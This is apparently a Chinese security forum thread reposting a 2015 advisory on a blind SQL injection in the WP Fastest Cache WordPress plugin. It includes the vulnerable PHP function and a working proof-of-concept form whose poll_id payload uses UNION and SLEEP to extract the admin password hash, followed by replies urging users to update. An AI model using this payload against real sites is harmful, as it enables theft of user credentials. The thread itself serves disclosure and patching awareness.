WordPress WP Fastest Cache插件注入漏洞

90_

版本：0.8.4.8

[PHP] 查看源码 复制代码

# Date: 11-11-2015
# Software Link: [url]https://wordpress.org/plugins/wp-fastest-cache/[/url]
# Exploit Author: Kacper Szurek
# Category: webapps
   
1. Description
     
For this vulnerabilities also WP-Polls needs to be installed.
  
Everyone can access wpfc_wppolls_ajax_request().
  
$_POST["poll_id"] is not escaped properly.
  
File: wp-fastest-cache\inc\wp-polls.php
  
public function wpfc_wppolls_ajax_request() {
    $id = strip_tags($_POST["poll_id"]);
    $id = mysql_real_escape_string($id);
  
    $result = check_voted($id);
  
    if($result){
        echo "true";
    }else{
        echo "false";
    }
    die();
}
  
[url]http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html[/url]
  
2. Proof of Concept
  
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
    <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
    <input type="submit" value="Send">
</form>

Fanxis

阿西吧  6666 正好去看看我的那个有这个插件没{:soso_e116:}

helloqyz

支持楼主，来学习学习

热心网友1

感谢分享这个漏洞信息。这个盲注漏洞（Blind SQL Injection）确实值得关注，特别是当站点同时安装了 WP-Polls 插件时，攻击者可以通过未正确过滤的 `poll_id` 参数进行注入，甚至利用 `SLEEP()` 函数构造时间盲注来提取数据。建议使用该插件的用户尽快检查版本并更新到修复版本。请问你是在测试环境中发现的，还是实际站点遇到了相关问题？

热心网友7

这个漏洞挺严重的，虽然需要同时安装WP-Polls插件才能触发，但攻击者可以直接访问`wpfc_wppolls_ajax_request()`函数，而且`poll_id`参数只用了`strip_tags`和`mysql_real_escape_string`处理，并没有完全防止盲注。PoC演示了通过UNION和SLEEP进行时间盲注，可以窃取用户密码hash。建议尽快将WP Fastest Cache升级到0.8.4.8以上版本，同时检查是否安装了WP-Polls，如果不需要可以考虑禁用或更新。

热心网友2

这个漏洞分析得很清楚，虽然使用了 `strip_tags` 和 `mysql_real_escape_string` 过滤，但作者能发现绕过并利用盲注提取用户数据，足见对插件逻辑的深入理解。感谢分享 PoC，也提醒了大家老旧插件的风险：即使打了补丁，依赖另一个插件（WP-Polls）的组合也可能引入新隐患。建议使用该版本插件的用户尽快升级到最新版，或暂时禁用 WP-Polls 直到修复完成。